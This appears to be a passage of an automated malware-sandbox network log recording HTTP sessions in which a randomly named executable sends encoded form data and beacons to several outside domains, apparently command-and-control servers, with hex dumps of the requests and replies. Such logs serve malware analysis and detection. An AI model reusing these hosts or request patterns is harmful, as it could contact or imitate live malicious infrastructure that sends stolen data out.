                                                      Data Ascii: rfJh=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T3gtYQtUlxM2LzX3HqT0smgfRgqYDWJ9C7NCcRZwmMIUYSVIsBLqg5Et+nsOiCOJJTwIfkch13Wrs96QvpJz5HABK7cgdjm0vXgKWccc9dtLo4WCGCb5OjjiSqtjySSR9s1sf1f9dgmpbtf1LHUVwSxGk8lHKPbEQgG5PWUlMAUMRcEqBtvVSFHziodSRiVJql14OPKlvxfdcpKmxcN71uYzFdIJ0frw1X/Jf2D58YnJp3o49aAymw9GUN+WFHjz4WLEYTEKlqS0zVHpYp17jidShxi5CgsBLtAhxkHeRPck/WIzh7bzlOnJsh987MDhN9AdqcEXTd86O06+pazAE5g9EpFUT/pMBRhlTVAJwynz3P/4wk0S+NrfDh7KYNu0QA8LZ1kP/dUEk3a0XUBvz/ovZJaI/8qM19R99qfCXMEUJS21tWn4SkPfW2MLpfvay/RI4N4F3+lUuAkyikBX+yRopCtsntShupXJGSYQjR0cR6pkXaSq6RIKa8Gjr1Vg8FjL0fikiNCK2U5qv8YPMPPpAcuHEfw8T/TdSho7daU05JTF4ryzsydTIRG2YUZK4oCRAczXZrnaiYOXD80vawHqkM7TPuY5Qapv9K532oXTsK0PbZ1H0gBG03Lf/GXW1uIytRS+YzLUKIB7fiCTBtOJbdokVFtsACoQyzz+GDLlzZfrfdYnm2Qyp1O2zJ7S7d3jNLlDYEr4HRVGUfVioC0t4MzRi5YXfXaFN6Y66cyyW/tzGOzcHaCPXc7b3uQPgtkWp8LEKiOjXN12k7r/qu/fJhdGQxIMRHQpvPr/Xw9Qq1MtuCmGfp32JZwMijtwWwHgpZGn7L5+UC+1qfd/JbQKmG13LkUkVO4jJnDFgabZkRXx6T9E4t/wahGP9sf3WzliunDCQ0Y7AHxMp/9xczSY50bphu3bENve1KTdoQHlX1JeuZceXdO6SSxTtihajvcUP8 [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.449971172.67.187.11480792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:08.170773983 CET364OUTGET /kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXIiiXeZyn2c+rOjHayKJI+/jeoNtslqItL4=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.zkdamdjj.shop
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:56:10.202681065 CET1236INHTTP/1.1 301 Moved Permanently
                                                      Date: Tue, 03 Dec 2024 05:56:10 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                      x-redirect-by: WordPress
                                                      location: https://zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXIiiXeZyn2c+rOjHayKJI+/jeoNtslqItL4=&O258-=pHdHBdXhwLO
                                                      x-litespeed-cache-control: public,max-age=3600
                                                      x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.fe2f0d048587da8ccb778a9020edc358,02a_
                                                      x-litespeed-cache: miss
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QztMNiTPONMg4StmNIegGpscxYCZkcm4p9tnRCOzKjWMpT9%2Bto11pLxhA5Wr8yjNJfe1QMy06FeAa9wh11Hob%2Bt%2FI1P4bxF47gn65qUeNMW5%2BkiNRUqG1Od%2FTLfggiJMyI50%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8ec14fd5584c4401-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1545&min_rtt=1545&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=364&delivery_rate=0&cwnd=229&unsent_b
                                                      Data Raw:
                                                      Data Ascii:
                                                      Dec 3, 2024 06:56:10.202702999 CET45INData Raw: 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: tes=0&cid=0000000000000000&ts=0&x=0"0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.44998913.248.169.4880792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:15.984447002 CET614OUTPOST /k1td/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.tals.xyz
                                                      Origin: http://www.tals.xyz
                                                      Referer: http://www.tals.xyz/k1td/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 66 33 7a 66 57 4c 65 6c 71 64 4e 43 48 32 4f 54 6c 51 64 33 58 46 74 32 41 7a 4a 50 30 52 50 65 67 6f 66 66 6b 4f 53 47 33 5a 56 73 52 73 54 67 6b 50 37 63 58 63 62 49 6c 71 6f 48 49 76 50 77 69 4b 77 65 59 55 45 52 58 6c 62 33 64 67 74 6f 4a 54 36 4e 46 45 58 59 48 67 6f 41 59 64 73 4d 38 39 32 70 48 58 61 78 48 65 66 54 73 30 47 4b 34 56 32 67 78 59 53 30 4e 42 6c 61 61 44 44 45 72 6a 6f 6d 68 33 59 58 6a 41 55 31 6b 36 6b 59 4b 4e 72 71 4a 63 74 55 65 64 63 2b 52 72 6c 4c 42 58 47 31 34 4e 6a 67 69 2f 61 36 4b 4d 39 55 57 55 44 6f 49 67 3d 3d
                                                      Data Ascii: rfJh=lGkRzIOh6zQ2f3zfWLelqdNCH2OTlQd3XFt2AzJP0RPegoffkOSG3ZVsRsTgkP7cXcbIlqoHIvPwiKweYUERXlb3dgtoJT6NFEXYHgoAYdsM892pHXaxHefTs0GK4V2gxYS0NBlaaDDErjomh3YXjAU1k6kYKNrqJctUedc+RrlLBXG14Njgi/a6KM9UWUDoIg==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.44999713.248.169.4880792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:18.655059099 CET634OUTPOST /k1td/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.tals.xyz
                                                      Origin: http://www.tals.xyz
                                                      Referer: http://www.tals.xyz/k1td/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 51 31 6e 66 47 63 4b 6c 2f 4e 4e 42 49 57 4f 54 2b 41 64 7a 58 46 68 32 41 79 4e 66 30 6a 37 65 68 4b 58 66 6c 50 53 47 77 5a 56 73 45 63 53 6b 71 76 37 74 58 63 58 71 6c 71 55 48 49 75 76 77 69 50 4d 65 59 6b 34 57 59 56 62 69 44 41 74 75 58 6a 36 4e 46 45 58 59 48 6a 56 64 59 64 30 4d 38 4e 6d 70 48 32 61 77 5a 75 66 63 76 30 47 4b 75 6c 32 6b 78 59 53 7a 4e 41 70 77 61 42 4c 45 72 6e 73 6d 67 6a 45 57 32 77 55 4a 36 4b 6c 34 44 34 4f 34 4f 75 30 41 56 50 30 71 51 35 78 33 4a 78 4c 76 70 38 43 33 77 2f 2b 4a 58 4c 30 67 62 58 2b 68 54 6e 54 6b 33 4a 65 63 52 64 68 4a 59 2f 4a 55 50 2b 69 53 6d 2f 49 3d
                                                      Data Ascii: rfJh=lGkRzIOh6zQ2Q1nfGcKl/NNBIWOT+AdzXFh2AyNf0j7ehKXflPSGwZVsEcSkqv7tXcXqlqUHIuvwiPMeYk4WYVbiDAtuXj6NFEXYHjVdYd0M8NmpH2awZufcv0GKul2kxYSzNApwaBLErnsmgjEW2wUJ6Kl4D4O4Ou0AVP0qQ5x3JxLvp8C3w/+JXL0gbX+hTnTk3JecRdhJY/JUP+iSm/I=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.45000413.248.169.4880792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:21.325094938 CET10716OUTPOST /k1td/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.tals.xyz
                                                      Origin: http://www.tals.xyz
                                                      Referer: http://www.tals.xyz/k1td/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 51 31 6e 66 47 63 4b 6c 2f 4e 4e 42 49 57 4f 54 2b 41 64 7a 58 46 68 32 41 79 4e 66 30 6a 6a 65 68 2f 62 66 6b 73 71 47 78 5a 56 73 46 63 53 70 71 76 37 4b 58 63 66 75 6c 71 5a 36 49 72 72 77 6a 70 34 65 54 33 67 57 50 46 62 69 4c 67 74 72 4a 54 37 51 46 45 48 63 48 67 74 64 59 64 30 4d 38 4c 4b 70 4f 48 61 77 62 75 66 54 73 30 47 65 34 56 32 63 78 59 4b 38 4e 41 74 4b 61 79 7a 45 71 48 38 6d 69 51 73 57 30 51 55 78 37 4b 6c 61 44 34 4c 6d 4f 75 6f 4d 56 4b 67 41 51 37 74 33 4b 51 2b 77 36 73 47 42 6d 75 69 36 4d 4a 67 39 66 6b 4f 39 52 48 58 42 35 71 6d 6b 50 66 70 6d 62 64 63 34 4c 76 6d 31 37 70 50 2b 4b 2b 73 58 36 73 75 41 34 37 6a 70 67 70 73 77 54 48 4b 72 49 6c 75 2b 69 64 63 32 53 76 6e 7a 65 4c 70 54 2f 4e 38 58 48 78 67 50 50 75 38 7a 54 73 4a 46 46 69 51 30 6f 71 4b 43 6a 31 39 71 49 4e 53 32 6d 79 42 59 79 56 4e 49 58 44 78 4b 45 4c 42 65 72 70 75 30 68 68 62 79 50 2b 31 72 7a 72 78 38 61 4e 79 4a 78 79 6c 53 53 59 2b 4f 79 65 44 35 6f [TRUNCATED]
                                                      Data Ascii: rfJh=lGkRzIOh6zQ2Q1nfGcKl/NNBIWOT+AdzXFh2AyNf0jjeh/bfksqGxZVsFcSpqv7KXcfulqZ6Irrwjp4eT3gWPFbiLgtrJT7QFEHcHgtdYd0M8LKpOHawbufTs0Ge4V2cxYK8NAtKayzEqH8miQsW0QUx7KlaD4LmOuoMVKgAQ7t3KQ+w6sGBmui6MJg9fkO9RHXB5qmkPfpmbdc4Lvm17pP+K+sX6suA47jpgpswTHKrIlu+idc2SvnzeLpT/N8XHxgPPu8zTsJFFiQ0oqKCj19qINS2myBYyVNIXDxKELBerpu0hhbyP+1rzrx8aNyJxylSSY+OyeD5o4C0F1fKiYl+pT+MxkekZ8eAOoc4MSz3+SPimPfc/B6p2hCdt1i6WUgEmFkYfGi3PsKg85jCzUMhsF8lhMYNCtAiddXteMyJdbO2RkW9U7vUhlYP5PZR9A6MwGx8NyhVCdOC7fh43XV8PffI3OtwQxbtJ7FGGiZILggmH7xrH3zyk7xLfwpL84HymgxavFnKl+FdDBTU1KviQJfBwNKuONSPuWTynZk/LOAYfaV4GP+TNHTUKOxnrF009HOAexkIVdQ/Fiiy6SZzAkWh9DJOT+6HrDSTjPwwyZOqvLW2z9wNBwputh2pSEDefE+bhTvfyBHANb8ZoCSBrORvVgaXejN6HqZAAarnZWwgjUKrgHYaJHnrBqIMd7Kd2xLOiBDAaWyJRK4ZjpQoNS07hUTHGn+wSb44NopiWP5gBgp+D9OD4381gqMhOnFKNndXmDAuW2HfcyI8vIQUrzYXHjOaXSl9W+05q2yuQ2D2yM/9yoRPmKMOLKl7/Pw7epuHGC5zTUoE5HMl4VrNRxXT35O8gWSpaNljFZis+rir7hLqeTLn4cYZwzWnnI1+JPGDVgV8QSK26wmwJYHZEd2Mkgj4uokV7l+v8No59zNxHIO0uDzbT5UrQnnu1r/1xsl0l6oHxyUXJuB4lmSdHasRGp35srjTrl+gzqrhqOe [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.45001113.248.169.4880792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:23.976130962 CET359OUTGET /k1td/?rfJh=oEMxw+ab8QlEZmTlDbCKptskN0q9+wMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTBaIFjRaD0WqdXDHZ0BQI5kG8sOnP1u2RJI=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.tals.xyz
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:56:25.157572985 CET398INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Tue, 03 Dec 2024 05:56:24 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 66 4a 68 3d 6f 45 4d 78 77 2b 61 62 38 51 6c 45 5a 6d 54 6c 44 62 43 4b 70 74 73 6b 4e 30 71 39 2b 77 4d 48 51 48 4e 70 62 6b 42 4d 78 43 6a 44 72 37 48 6c 6f 64 6e 5a 67 66 46 73 51 4b 47 4b 6b 76 7a 2f 58 59 7a 70 76 50 4d 59 65 70 33 2b 73 5a 73 59 59 48 63 43 54 42 61 49 46 6a 52 61 44 30 57 71 64 58 44 48 5a 30 42 51 49 35 6b 47 38 73 4f 6e 50 31 75 32 52 4a 49 3d 26 4f 32 35 38 2d 3d 70 48 64 48 42 64 58 68 77 4c 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rfJh=oEMxw+ab8QlEZmTlDbCKptskN0q9+wMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTBaIFjRaD0WqdXDHZ0BQI5kG8sOnP1u2RJI=&O258-=pHdHBdXhwLO"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.450027203.161.42.7380792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:30.740322113 CET650OUTPOST /gn26/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.brightvision.website
                                                      Origin: http://www.brightvision.website
                                                      Referer: http://www.brightvision.website/gn26/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 51 31 56 38 6c 4b 55 53 31 47 47 6a 68 70 4e 64 55 76 35 63 44 46 68 4c 76 4e 49 75 64 59 6a 6d 52 58 38 79 47 4d 59 6f 72 32 35 48 30 57 72 68 4a 6e 71 31 51 38 69 63 56 4c 32 75 36 4c 67 54 34 49 71 35 74 54 6a 7a 68 63 55 32 44 46 46 4d 42 61 31 56 61 4c 66 66 4c 2f 58 65 30 6d 41 55 75 6d 75 4b 74 32 50 37 52 47 34 4a 2f 45 71 77 50 44 50 30 51 70 35 67 77 4a 4b 54 51 78 75 41 4e 38 55 4a 2b 53 77 35 75 71 50 62 56 59 70 66 4d 44 46 63 6a 65 56 46 55 74 6e 4e 61 45 52 41 4c 6c 37 31 64 67 4a 74 55 63 70 49 6a 53 31 6c 58 51 37 6d 2f 51 3d 3d
                                                      Data Ascii: rfJh=SiBzWWJ1sOT3Q1V8lKUS1GGjhpNdUv5cDFhLvNIudYjmRX8yGMYor25H0WrhJnq1Q8icVL2u6LgT4Iq5tTjzhcU2DFFMBa1VaLffL/Xe0mAUumuKt2P7RG4J/EqwPDP0Qp5gwJKTQxuAN8UJ+Sw5uqPbVYpfMDFcjeVFUtnNaERALl71dgJtUcpIjS1lXQ7m/Q==
                                                      Dec 3, 2024 06:56:32.052464962 CET1236INHTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:56:31 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                      Dec 3, 2024 06:56:32.052531958 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                      Dec 3, 2024 06:56:32.052546024 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                      Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                      Dec 3, 2024 06:56:32.052683115 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                      Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                      Dec 3, 2024 06:56:32.052746058 CET1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                      Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                      Dec 3, 2024 06:56:32.052858114 CET1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                      Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                      Dec 3, 2024 06:56:32.052867889 CET1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                      Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                      Dec 3, 2024 06:56:32.052877903 CET108INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                      Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
                                                      Dec 3, 2024 06:56:32.052886009 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                      Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                      Dec 3, 2024 06:56:32.052895069 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                      Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                      Dec 3, 2024 06:56:32.173650026 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                      Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.450034203.161.42.7380792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:33.402578115 CET670OUTPOST /gn26/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.brightvision.website
                                                      Origin: http://www.brightvision.website
                                                      Referer: http://www.brightvision.website/gn26/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
